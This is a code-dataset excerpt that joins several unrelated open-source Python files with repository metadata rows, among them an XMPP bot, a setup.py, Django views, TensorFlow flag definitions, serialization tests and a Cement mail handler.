(userid), data=params, auth=self.bokzuy_auth, verify=False)
return response.content
def get_badges(self):
response = requests.get("https://api.bokzuy.com/badges",\
auth=self.bokzuy_auth, verify=False)
return response.content
def get_friends(self):
response = requests.get("https://api.bokzuy.com/me/friends",\
auth=self.bokzuy_auth, verify=False)
return response.content
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
# Bokzuy user and password options.
optp.add_option("-b", "--bokid", dest="bokzuy_username",
help="Bokzuy user to use")
optp.add_option("-w", "--bokpass", dest="bokzuy_password",
help="Bokzuy password to use")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
if opts.bokzuy_username is None:
opts.bokzuy_username = raw_input("Bokzuy username: ")
if opts.bokzuy_password is None:
opts.bokzuy_password = getpass.getpass("Bokzuy password: ")
bokzuy_auth = (opts.bokzuy_username, opts.bokzuy_password)
xmpp = EchoBot(opts.jid, opts.password, bokzuy_auth)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0060') # PubSub
xmpp.register_plugin('xep_0199') # XMPP Ping
if xmpp.connect(('talk.google.com', 5222)):
#xmpp.process(block=True)
xmpp.process(threaded=False)
print("Done!")
else:
print("Unable to connect.")
| gpl-2.0 | -1,316,866,664,008,892,200 | 31.270718 | 79 | 0.564287 | false |
coderatchet/scrapy-test | setup.py | 1 | 1740 | #!/usr/bin/python
# -*- coding: utf-8 -*- #
"""
setup.py
Copyright 2017 CodeRatchet
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
"""
from setuptools import setup, find_packages
from scrapytest import __version__
import sys
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []
setup(
name="scrapytest",
version=__version__,
description='A Test for assessing developer\'s proficiency',
url='https://github.com/coderatchet/scrapt-test.git',
long_description=open("README.md").read(),
download_url='https://github.com/coderatchet/scrapytest/archive/' + __version__ + '.tar.gz',
license='Apache 2.0',
author='CodeRatchet',
author_email='[email protected]',
maintainer='Jared Nagle',
maintainer_email='[email protected]',
classifiers=[
'Development Status :: 1 - Planning',
'Environment :: Console',
'License :: OSI Approved',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.5',
'Topic :: Text Processing :: Markup :: HTML'
],
platforms=['any'],
packages=find_packages(),
include_package_data=True,
install_requires=['scrapy>=1.3.2', 'pyasn1', 'pymongo', 'mongoengine>=0.1.1'],
tests_require=['psutil', 'pytest'],
# empty array for now
setup_requires=[] + pytest_runner
)
| apache-2.0 | 38,268,766,462,424,410 | 31.830189 | 96 | 0.645402 | false |
alexey-grom/django-userflow | userflow/views/verify/request.py | 1 | 1109 | # encoding: utf-8
from django.http.response import HttpResponseRedirect, Http404
from django.views.generic.detail import DetailView
from userflow.models import UserEmail
class RequestConfirmEmailView(DetailView):
model = UserEmail
def get_queryset(self):
return super(RequestConfirmEmailView, self).get_queryset().inactive()
def get_object(self, queryset=None):
object = super(RequestConfirmEmailView, self).get_object(queryset)
if object.user != self.request.user:
if object.user.is_active:
raise Http404
confirmation = object.confirmations.\
unfinished().\
first()
if not confirmation:
from userflow.models import EmailConfirmation
confirmation = EmailConfirmation.objects.create(email=object)
return confirmation
def render_to_response(self, context, **response_kwargs):
self.object.send('verify',
self.object.get_owner(),
self.request)
return HttpResponseRedirect(self.object.get_wait_url())
| mit | 1,387,404,666,578,132,700 | 33.65625 | 77 | 0.655546 | false |
tensorflow/tensor2tensor | tensor2tensor/utils/flags.py | 1 | 6431 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common command-line flags."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_bool("registry_help", False,
"If True, logs the contents of the registry and exits.")
flags.DEFINE_bool("tfdbg", False,
"If True, use the TF debugger CLI on train/eval.")
flags.DEFINE_bool("export_saved_model", False,
"DEPRECATED - see serving/export.py.")
flags.DEFINE_bool("dbgprofile", False,
"If True, record the timeline for chrome://tracing/.")
flags.DEFINE_string("model", None, "Which model to use.")
flags.DEFINE_string("hparams_set", None, "Which parameters to use.")
flags.DEFINE_string("hparams_range", None, "Parameters range.")
flags.DEFINE_string("hparams", "",
"A comma-separated list of `name=value` hyperparameter "
"values. This flag is used to override hyperparameter "
"settings either when manually selecting hyperparameters "
"or when using Vizier. If a hyperparameter setting is "
"specified by this flag then it must be a valid "
"hyperparameter name for the model.")
flags.DEFINE_string("problem", None, "Problem name.")
# data_dir is a common flag name - catch conflicts and define it once.
try:
flags.DEFINE_string("data_dir", None, "Directory with training data.")
except: # pylint: disable=bare-except
pass
flags.DEFINE_integer("train_steps", 250000,
"The number of steps to run training for.")
flags.DEFINE_string("eval_early_stopping_metric", "loss",
"If --eval_early_stopping_steps is not None, then stop "
"when --eval_early_stopping_metric has not decreased for "
"--eval_early_stopping_steps")
flags.DEFINE_float("eval_early_stopping_metric_delta", 0.1,
"Delta determining whether metric has plateaued.")
flags.DEFINE_integer("eval_early_stopping_steps", None,
"If --eval_early_stopping_steps is not None, then stop "
"when --eval_early_stopping_metric has not decreased for "
"--eval_early_stopping_steps")
flags.DEFINE_bool("eval_early_stopping_metric_minimize", True,
"Whether to check for the early stopping metric going down "
"or up.")
flags.DEFINE_integer("eval_timeout_mins", 240,
"The maximum amount of time to wait to wait between "
"checkpoints. Set -1 to wait indefinitely.")
flags.DEFINE_bool("eval_run_autoregressive", False,
"Run eval autoregressively where we condition on previous"
"generated output instead of the actual target.")
flags.DEFINE_bool("eval_use_test_set", False,
"Whether to use the '-test' data for EVAL (and PREDICT).")
flags.DEFINE_integer("keep_checkpoint_max", 20,
"How many recent checkpoints to keep.")
flags.DEFINE_bool("enable_graph_rewriter", False,
"Enable graph optimizations that are not on by default.")
flags.DEFINE_integer("keep_checkpoint_every_n_hours", 10000,
"Number of hours between each checkpoint to be saved. "
"The default value 10,000 hours effectively disables it.")
flags.DEFINE_integer("save_checkpoints_secs", 0,
"Save checkpoints every this many seconds. "
"Default=0 means save checkpoints each x steps where x "
"is max(iterations_per_loop, local_eval_frequency).")
flags.DEFINE_bool("log_device_placement", False,
"Whether to log device placement.")
flags.DEFINE_string("warm_start_from", None, "Warm start from checkpoint.")
# Distributed training flags
flags.DEFINE_integer("local_eval_frequency", 1000,
"Save checkpoints and run evaluation every N steps during "
"local training.")
flags.DEFINE_integer("eval_throttle_seconds", 600,
"Do not re-evaluate unless the last evaluation was started"
" at least this many seconds ago.")
flags.DEFINE_bool("sync", False, "Sync compute on PS.")
flags.DEFINE_string("worker_job", "/job:localhost", "name of worker job")
flags.DEFINE_integer("worker_gpu", 1, "How many GPUs to use.")
flags.DEFINE_integer("worker_replicas", 1, "How many workers to use.")
flags.DEFINE_integer("worker_id", 0, "Which worker task are we.")
flags.DEFINE_float("worker_gpu_memory_fraction", 0.95,
"Fraction of GPU memory to allocate.")
flags.DEFINE_integer("ps_gpu", 0, "How many GPUs to use per ps.")
flags.DEFINE_string("gpu_order", "", "Optional order for daisy-chaining GPUs."
" e.g. \"1 3 2 4\"")
flags.DEFINE_string("ps_job", "/job:ps", "name of ps job")
flags.DEFINE_integer("ps_replicas", 0, "How many ps replicas.")
# Decoding flags
flags.DEFINE_string("decode_hparams", "",
"Comma-separated list of name=value pairs to control "
"decode behavior. See decoding.decode_hparams for "
"defaults.")
flags.DEFINE_string("decode_from_file", "",
"Path to the source file for decoding, used by "
"continuous_decode_from_file.")
flags.DEFINE_string("decode_to_file", "",
"Path to the decoded file generated by decoding, used by "
"continuous_decode_from_file.")
flags.DEFINE_string("decode_reference", "",
"Path to the reference file for decoding, used by "
"continuous_decode_from_file to compute BLEU score.")
| apache-2.0 | -5,781,691,177,619,446,000 | 50.862903 | 80 | 0.636759 | false |
JudoWill/glue | glue/core/tests/test_state.py | 1 | 13000 | from __future__ import absolute_import, division, print_function
import numpy as np
import json
import pytest
from ..state import (GlueSerializer, GlueUnSerializer,
saver, loader, VersionedDict)
from ...external import six
from ... import core
from ...qt.glue_application import GlueApplication
from ...qt.widgets.scatter_widget import ScatterWidget
from ...qt.widgets.image_widget import ImageWidget
from ...qt.widgets.histogram_widget import HistogramWidget
from .util import make_file
from ..data_factories import load_data
from ..data_factories.tests.test_data_factories import TEST_FITS_DATA
from io import BytesIO
from ...tests.helpers import requires_astropy
def clone(object, include_data=False):
gs = GlueSerializer(object, include_data=include_data)
oid = gs.id(object)
dump = gs.dumps()
gu = GlueUnSerializer.loads(dump)
result = gu.object(oid)
return result
def doubler(x):
return 2 * x
def containers_equal(c1, c2):
"""Check that two container-like items have the same contents,
ignoring differences relating to the type of container
"""
if isinstance(c1, six.string_types):
return c1 == c2
try:
for a, b in zip(c1, c2):
if not containers_equal(a, b):
return False
if isinstance(c1, dict) and isinstance(c2, dict):
if not containers_equal(c1[a], c2[b]):
return False
except TypeError:
pass
return True
class Cloner(object):
def __init__(self, obj):
self.s = GlueSerializer(obj)
self.us = GlueUnSerializer.loads(self.s.dumps())
def get(self, o):
return self.us.object(self.s.id(o))
class Circular(object):
def __gluestate__(self, context):
return dict(other=context.id(self.other))
@classmethod
def __setgluestate__(cls, rec, context):
result = cls()
yield result
result.other = context.object(rec['other'])
def test_generator_loaders():
f = Circular()
b = Circular()
f.other = b
b.other = f
f2 = clone(f)
assert f2.other.other is f2
def test_none():
assert clone(None) is None
def test_data():
d = core.Data(x=[1, 2, 3], label='testing')
d2 = clone(d)
assert d2.label == 'testing'
np.testing.assert_array_equal(d2['x'], [1, 2, 3])
np.testing.assert_array_equal(d2['Pixel Axis 0'], [0, 1, 2])
def test_data_style():
d = core.Data(x=[1, 2, 3])
d.style.color = 'blue'
d2 = clone(d)
assert d2.style.color == 'blue'
@requires_astropy
def test_data_factory():
with make_file(TEST_FITS_DATA, '.fits', decompress=True) as infile:
d = load_data(infile)
d2 = clone(d)
np.testing.assert_array_equal(d['PRIMARY'], d2['PRIMARY'])
@requires_astropy
def test_data_factory_include_data():
with make_file(TEST_FITS_DATA, '.fits', decompress=True) as infile:
d = load_data(infile)
d2 = clone(d, include_data=True)
np.testing.assert_array_equal(d['PRIMARY'], d2['PRIMARY'])
def test_save_numpy_scalar():
assert clone(np.float32(5)) == 5
@requires_astropy
def tests_data_factory_double():
# ensure double-cloning doesn't somehow lose lightweight references
from astropy.io import fits
d = np.random.normal(0, 1, (100, 100, 100))
s = BytesIO()
fits.writeto(s, d)
with make_file(s.getvalue(), '.fits') as infile:
d = load_data(infile)
d2 = clone(d)
assert len(GlueSerializer(d).dumps()) < \
1.1 * len(GlueSerializer(d2).dumps())
def test_inequality_subset():
d = core.Data(x=[1, 2, 3], label='testing')
s = d.new_subset(label='abc')
s.subset_state = d.id['x'] > 1
d2 = clone(d)
s2 = d2.subsets[0]
assert s.label == s2.label
np.testing.assert_array_equal(s2.to_mask(), [False, True, True])
assert s.style == s2.style
def test_compound_state():
d = core.Data(x=[1, 2, 3])
s = d.new_subset(label='abc')
s.subset_state = (d.id['x'] > 2) | (d.id['x'] < 1.5)
d2 = clone(d)
np.testing.assert_array_equal(d2.subsets[0].to_mask(), [True, False, True])
def test_empty_subset():
d = core.Data(x=[1, 2, 3], label='testing')
s = d.new_subset(label='abc')
s.style.color = 'blue'
s2 = clone(s)
assert s.style == s2.style
assert s2.style.color == 'blue'
def test_box_roi_subset():
d = core.Data(x=[1, 2, 3], y=[2, 4, 8])
s = d.new_subset(label='box')
roi = core.roi.RectangularROI(xmin=1.1, xmax=2.1, ymin=2.2, ymax=4.2)
s.subset_state = core.subset.RoiSubsetState(xatt=d.id['x'],
yatt=d.id['y'], roi=roi)
d2 = clone(d)
np.testing.assert_array_equal(
d2.subsets[0].to_mask(), [False, True, False])
def test_range_subset():
d = core.Data(x=[1, 2, 3])
s = d.new_subset(label='range')
s.subset_state = core.subset.RangeSubsetState(0.5, 2.5, att=d.id['x'])
d2 = clone(d)
np.testing.assert_array_equal(
d2.subsets[0].to_mask(), [True, True, False])
def test_complex_state():
d = core.Data(x=[1, 2, 3], y=[2, 4, 8])
s = d.new_subset(label='test')
s.subset_state = (d.id['x'] > 2) | (d.id['y'] < 4)
s.subset_state = s.subset_state & (d.id['x'] < 4)
d2 = clone(d)
s2 = d2.subsets[0]
np.testing.assert_array_equal(s2.to_mask(), [True, False, True])
def test_range_roi():
roi = core.roi.RangeROI('x', min=1, max=2)
r2 = clone(roi)
assert r2.ori == 'x'
assert r2.min == 1
assert r2.max == 2
def test_circular_roi():
roi = core.roi.CircularROI(xc=0, yc=1, radius=2)
r2 = clone(roi)
assert r2.xc == 0
assert r2.yc == 1
assert r2.radius == 2
def test_polygonal_roi():
roi = core.roi.PolygonalROI()
roi.add_point(0, 0)
roi.add_point(0, 1)
roi.add_point(1, 0)
r2 = clone(roi)
assert r2.vx == [0, 0, 1]
assert r2.vy == [0, 1, 0]
def check_clone_app(app):
c = Cloner(app)
copy = c.us.object('__main__')
hub1 = app.session.hub
hub2 = copy.session.hub
assert len(hub1._subscriptions) == len(hub2._subscriptions)
# data collections are the same
for d1, d2 in zip(app.session.data_collection,
copy.session.data_collection):
assert d1.label == d2.label
for cid1, cid2 in zip(d1.components, d2.components):
assert cid1.label == cid2.label
# order of components unspecified if label collisions
cid2 = c.get(cid1)
np.testing.assert_array_almost_equal(d1[cid1, 0:1],
d2[cid2, 0:1], 3)
# same data viewers, in the same tabs
for tab1, tab2 in zip(app.viewers, copy.viewers):
assert len(tab1) == len(tab2)
for v1, v2 in zip(tab1, tab2):
assert type(v1) == type(v2)
# same window properties
assert v1.viewer_size == v2.viewer_size
assert v1.position == v2.position
# same viewer-level properties (axis label, scaling, etc)
assert set(v1.properties.keys()) == set(v2.properties.keys())
for k in v1.properties:
if hasattr(v1.properties[k], 'label'):
assert v1.properties[k].label == v2.properties[k].label
else:
assert v1.properties[k] == v2.properties[k] or \
containers_equal(v1.properties[k], v2.properties[k])
assert len(v1.layers) == len(v2.layers)
for l1, l2 in zip(v1.layers, v2.layers):
assert l1.layer.label == l2.layer.label # same data/subset
assert l1.layer.style == l2.layer.style
return copy
class TestApplication(object):
def check_clone(self, app):
return check_clone_app(app)
def test_bare_application(self):
app = GlueApplication()
self.check_clone(app)
def test_data_application(self):
dc = core.DataCollection([core.Data(label='test',
x=[1, 2, 3], y=[2, 3, 4])])
app = GlueApplication(dc)
self.check_clone(app)
def test_links(self):
d1 = core.Data(label='x', x=[1, 2, 3])
d2 = core.Data(label='y', y=[3, 4, 8])
dc = core.DataCollection([d1, d2])
link = core.ComponentLink([d1.id['x']], d2.id['y'], doubler)
dc.add_link(link)
np.testing.assert_array_equal(d1['y'], [2, 4, 6])
app = GlueApplication(dc)
self.check_clone(app)
def test_scatter_viewer(self):
d = core.Data(label='x', x=[1, 2, 3, 4, 5], y=[2, 3, 4, 5, 6])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w = app.new_data_viewer(ScatterWidget, data=d)
self.check_clone(app)
s1 = dc.new_subset_group()
s2 = dc.new_subset_group()
assert len(w.layers) == 3
l1, l2, l3 = w.layers
l1.zorder, l2.zorder = l2.zorder, l1.zorder
l3.visible = False
assert l3.visible is False
copy = self.check_clone(app)
assert copy.viewers[0][0].layers[-1].visible is False
def test_multi_tab(self):
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w1 = app.new_data_viewer(HistogramWidget, data=d)
app.new_tab()
w2 = app.new_data_viewer(HistogramWidget, data=d)
assert app.viewers == ((w1,), (w2,))
self.check_clone(app)
def test_histogram(self):
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
app = GlueApplication(dc)
w = app.new_data_viewer(HistogramWidget, data=d)
self.check_clone(app)
dc.new_subset_group()
assert len(w.layers) == 2
self.check_clone(app)
w.nbins = 7
self.check_clone(app)
def test_subset_groups_remain_synced_after_restore(self):
# regrssion test for 352
d = core.Data(label='hist', x=[[1, 2], [2, 3]])
dc = core.DataCollection([d])
dc.new_subset_group()
app = GlueApplication(dc)
app2 = clone(app)
sg = app2.data_collection.subset_groups[0]
assert sg.style.parent is sg
sg.style.color = '#112233'
assert sg.subsets[0].style.color == '#112233'
class DummyClass(object):
pass
class TestVersioning(object):
def setup_method(self, method):
@saver(DummyClass, version=1)
def s(d, context):
return dict(v=3)
@loader(DummyClass, version=1)
def l(d, context):
return 3
@saver(DummyClass, version=2)
def s(d, context):
return dict(v=4)
@loader(DummyClass, version=2)
def l(rec, context):
return 4
def teardown_method(self, method):
GlueSerializer.dispatch._data[DummyClass].pop(1)
GlueSerializer.dispatch._data[DummyClass].pop(2)
GlueUnSerializer.dispatch._data[DummyClass].pop(1)
GlueUnSerializer.dispatch._data[DummyClass].pop(2)
def test_default_latest_save(self):
assert list(GlueSerializer(DummyClass()).dumpo().values())[0]['v'] == 4
assert list(GlueSerializer(DummyClass()).dumpo().values())[0]['_protocol'] == 2
def test_legacy_load(self):
data = json.dumps({'': {'_type': 'glue.core.tests.test_state.DummyClass',
'_protocol': 1, 'v': 2}})
assert GlueUnSerializer(data).object('') == 3
def test_default_earliest_load(self):
data = json.dumps({'': {'_type': 'glue.core.tests.test_state.DummyClass'}})
assert GlueUnSerializer(data).object('') == 3
class TestVersionedDict(object):
def test_bad_add(self):
d = VersionedDict()
with pytest.raises(KeyError):
d['nonsequential', 2] = 5
def test_get(self):
d = VersionedDict()
d['key', 1] = 5
d['key', 2] = 6
d['key', 3] = 7
assert d['key'] == (7, 3)
assert d.get_version('key', 1) == 5
assert d.get_version('key', 2) == 6
assert d.get_version('key', 3) == 7
with pytest.raises(KeyError) as exc:
d['missing']
def test_get_missing(self):
d = VersionedDict()
d['key', 1] = 5
with pytest.raises(KeyError) as exc:
d.get_version('key', 2)
assert exc.value.args[0] == 'No value associated with version 2 of key'
def test_contains(self):
d = VersionedDict()
assert 'key' not in d
d['key', 1] = 3
assert 'key' in d
def test_overwrite_forbidden(self):
d = VersionedDict()
d['key', 1] = 3
with pytest.raises(KeyError) as exc:
d['key', 1] = 3
def test_noninteger_version(self):
d = VersionedDict()
with pytest.raises(ValueError) as exc:
d['key', 'bad'] = 4
| bsd-3-clause | 7,194,414,388,734,389,000 | 27.384279 | 87 | 0.575231 | false |
mkuron/espresso | src/config/check_myconfig.py | 1 | 3768 | # Copyright (C) 2010-2018 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from subprocess import CalledProcessError
from defines import Defines
import featuredefs
def damerau_levenshtein_distance(s1, s2):
d = {}
lenstr1 = len(s1)
lenstr2 = len(s2)
for i in range(-1, lenstr1 + 1):
d[(i, -1)] = i + 1
for j in range(-1, lenstr2 + 1):
d[(-1, j)] = j + 1
for i in range(lenstr1):
for j in range(lenstr2):
if s1[i] == s2[j]:
cost = 0
else:
cost = 1
d[(i, j)] = min(
d[(i - 1, j)] + 1, # deletion
d[(i, j - 1)] + 1, # insertion
d[(i - 1, j - 1)] + cost, # substitution
)
if i and j and s1[i] == s2[j - 1] and s1[i - 1] == s2[j]:
d[(i, j)] = min(d[(i, j)], d[i - 2, j - 2] + cost)
# transposition
return d[lenstr1 - 1, lenstr2 - 1]
def handle_unknown(f, all_features):
match = None
max_dist = max(2, len(f) // 2)
for d in all_features:
dist = damerau_levenshtein_distance(f, d)
if dist < max_dist:
min_dist = dist
match = d
if match:
print("Unknown feature '{}', did you mean '{}'?".format(f, match))
else:
print("Unknown feature '{}'".format(f))
class FeatureError(Exception):
pass
def print_exception(ex):
print("""Skipped external header because {} returned non-zero exit code {},
output: {}.""".format(' '.join(ex.cmd), ex.returncode, ex.output.strip()))
def check_myconfig(compiler, feature_file, myconfig, pre_header=None):
# This does not work on all compilers, so if the parsing fails
# we just bail out.
external_defs = []
if pre_header:
try:
external_features = Defines(compiler).defines(pre_header)
except CalledProcessError as ex:
print_exception(ex)
return
external_defs = ['-D' + s for s in external_features]
try:
my_features = Defines(compiler, flags=external_defs).defines(myconfig)
except CalledProcessError as ex:
print_exception(ex)
return
# Parse feature file
defs = featuredefs.defs(feature_file)
error_state = False
for e in (my_features & defs.externals):
error_state = True
my_features.remove(e)
print(
"External feature '{}' can not be defined in myconfig.".format(e))
for u in (my_features - defs.features):
if u.startswith('__'):
continue
error_state = True
handle_unknown(u, defs.features)
if error_state:
raise FeatureError("There were errors in '{}'".format(sys.argv[3]))
else:
return
if __name__ == "__main__":
if len(sys.argv) > 4:
pre_header = sys.argv[4]
else:
pre_header = None
try:
check_myconfig(sys.argv[1], sys.argv[2], sys.argv[3], pre_header)
sys.exit()
except FeatureError:
sys.exit("There were errors in '{}'".format(sys.argv[3]))
| gpl-3.0 | 4,629,193,591,994,059,000 | 28.904762 | 87 | 0.57776 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/lettuce/django/apps.py | 1 | 3009 | # -*- coding: utf-8 -*-
# <Lettuce - Behaviour Driven Development for python>
# Copyright (C) <2010-2012> Gabriel Falcão <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from os.path import join, dirname
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.apps import apps as django_apps
from django.conf import settings
def _filter_bultins(module):
"returns only those apps that are not builtin django.contrib"
name = module.__name__
return not name.startswith("django.contrib") and name != 'lettuce.django'
def _filter_configured_apps(module):
"returns only those apps that are in django.conf.settings.LETTUCE_APPS"
app_found = True
if hasattr(settings, 'LETTUCE_APPS') and isinstance(settings.LETTUCE_APPS, tuple):
app_found = False
for appname in settings.LETTUCE_APPS:
if module.__name__.startswith(appname):
app_found = True
return app_found
def _filter_configured_avoids(module):
"returns apps that are not within django.conf.settings.LETTUCE_AVOID_APPS"
run_app = False
if hasattr(settings, 'LETTUCE_AVOID_APPS') and isinstance(settings.LETTUCE_AVOID_APPS, tuple):
for appname in settings.LETTUCE_AVOID_APPS:
if module.__name__.startswith(appname):
run_app = True
return not run_app
def get_apps():
return [app_cfg.module for app_cfg in django_apps.get_app_configs()]
def harvest_lettuces(only_the_apps=None, avoid_apps=None, path="features"):
"""gets all installed apps that are not from django.contrib
returns a list of tuples with (path_to_app, app_module)
"""
apps = get_apps()
if isinstance(only_the_apps, tuple) and any(only_the_apps):
def _filter_only_specified(module):
return module.__name__ in only_the_apps
apps = filter(_filter_only_specified, apps)
else:
apps = filter(_filter_bultins, apps)
apps = filter(_filter_configured_apps, apps)
apps = filter(_filter_configured_avoids, apps)
if isinstance(avoid_apps, tuple) and any(avoid_apps):
def _filter_avoid(module):
return module.__name__ not in avoid_apps
apps = filter(_filter_avoid, apps)
joinpath = lambda app: (join(dirname(app.__file__), path), app)
return map(joinpath, apps)
| agpl-3.0 | -8,298,065,788,740,383,000 | 34.388235 | 98 | 0.691822 | false |
rjdp/cement | cement/ext/ext_dummy.py | 1 | 6538 | """Dummy Framework Extension"""
from ..core import backend, output, handler, mail
from ..utils.misc import minimal_logger
LOG = minimal_logger(__name__)
class DummyOutputHandler(output.CementOutputHandler):
"""
This class is an internal implementation of the
:ref:`IOutput <cement.core.output>` interface. It does not take any
parameters on initialization, and does not actually output anything.
"""
class Meta:
"""Handler meta-data"""
interface = output.IOutput
"""The interface this class implements."""
label = 'dummy'
"""The string identifier of this handler."""
display_override_option = False
def render(self, data_dict, template=None):
"""
This implementation does not actually render anything to output, but
rather logs it to the debug facility.
:param data_dict: The data dictionary to render.
:param template: The template parameter is not used by this
implementation at all.
:returns: None
"""
LOG.debug("not rendering any output to console")
LOG.debug("DATA: %s" % data_dict)
return None
class DummyMailHandler(mail.CementMailHandler):
"""
This class implements the :ref:`IMail <cement.core.mail>`
interface, but is intended for use in development as no email is actually
sent.
**Usage**
.. code-block:: python
class MyApp(CementApp):
class Meta:
label = 'myapp'
mail_handler = 'dummy'
# create, setup, and run the app
app = MyApp()
app.setup()
app.run()
# fake sending an email message
app.mail.send('This is my fake message',
subject='This is my subject',
to=['[email protected]', '[email protected]'],
from_addr='[email protected]',
)
The above will print the following to console:
.. code-block:: text
======================================================================
DUMMY MAIL MESSAGE
----------------------------------------------------------------------
To: [email protected], [email protected]
From: [email protected]
CC:
BCC:
Subject: This is my subject
---
This is my fake message
----------------------------------------------------------------------
**Configuration**
This handler supports the following configuration settings:
* **to** - Default ``to`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **from_addr** - Default ``from_addr`` address
* **cc** - Default ``cc`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **bcc** - Default ``bcc`` addresses (list, or comma separated depending
on the ConfigHandler in use)
* **subject** - Default ``subject``
* **subject_prefix** - Additional string to prepend to the ``subject``
You can add these to any application configuration file under a
``[mail.dummy]`` section, for example:
**~/.myapp.conf**
.. code-block:: text
[myapp]
# set the mail handler to use
mail_handler = dummy
[mail.dummy]
# default to addresses (comma separated list)
to = [email protected]
# default from address
from = [email protected]
# default cc addresses (comma separated list)
cc = [email protected], [email protected]
# default bcc addresses (comma separated list)
bcc = [email protected], [email protected]
# default subject
subject = This is The Default Subject
# additional prefix to prepend to the subject
subject_prefix = MY PREFIX >
"""
class Meta:
#: Unique identifier for this handler
label = 'dummy'
def _get_params(self, **kw):
params = dict()
for item in ['to', 'from_addr', 'cc', 'bcc', 'subject']:
config_item = self.app.config.get(self._meta.config_section, item)
params[item] = kw.get(item, config_item)
# also grab the subject_prefix
params['subject_prefix'] = self.app.config.get(
self._meta.config_section,
'subject_prefix'
)
return params
def send(self, body, **kw):
"""
Mimic sending an email message, but really just print what would be
sent to console. Keyword arguments override configuration
defaults (cc, bcc, etc).
:param body: The message body to send
:type body: multiline string
:keyword to: List of recipients (generally email addresses)
:type to: list
:keyword from_addr: Address (generally email) of the sender
:type from_addr: string
:keyword cc: List of CC Recipients
:type cc: list
:keyword bcc: List of BCC Recipients
:type bcc: list
:keyword subject: Message subject line
:type subject: string
:returns: Boolean (``True`` if message is sent successfully, ``False``
otherwise)
**Usage**
.. code-block:: python
# Using all configuration defaults
app.mail.send('This is my message body')
# Overriding configuration defaults
app.mail.send('My message body'
to=['[email protected]'],
from_addr='[email protected]',
cc=['[email protected]', '[email protected]'],
subject='This is my subject',
)
"""
# shorted config values
params = self._get_params(**kw)
msg = "\n" + "=" * 77 + "\n"
msg += "DUMMY MAIL MESSAGE\n"
msg += "-" * 77 + "\n\n"
msg += "To: %s\n" % ', '.join(params['to'])
msg += "From: %s\n" % params['from_addr']
msg += "CC: %s\n" % ', '.join(params['cc'])
msg += "BCC: %s\n" % ', '.join(params['bcc'])
if params['subject_prefix'] not in [None, '']:
msg += "Subject: %s %s\n\n---\n\n" % (params['subject_prefix'],
params['subject'])
else:
msg += "Subject: %s\n\n---\n\n" % params['subject']
msg += body + "\n"
msg += "\n" + "-" * 77 + "\n"
print(msg)
return True
def load(app):
handler.register(DummyOutputHandler)
handler.register(DummyMailHandler)
| bsd-3-clause | 3,786,560,060,303,839,700 | 28.318386 | 78 | 0.547568 | false |
OpenAcademy-OpenStack/nova-scheduler | nova/tests/api/openstack/compute/plugins/v3/admin_only_action_common.py | 1 | 6858 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova.compute import vm_states
import nova.context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import timeutils
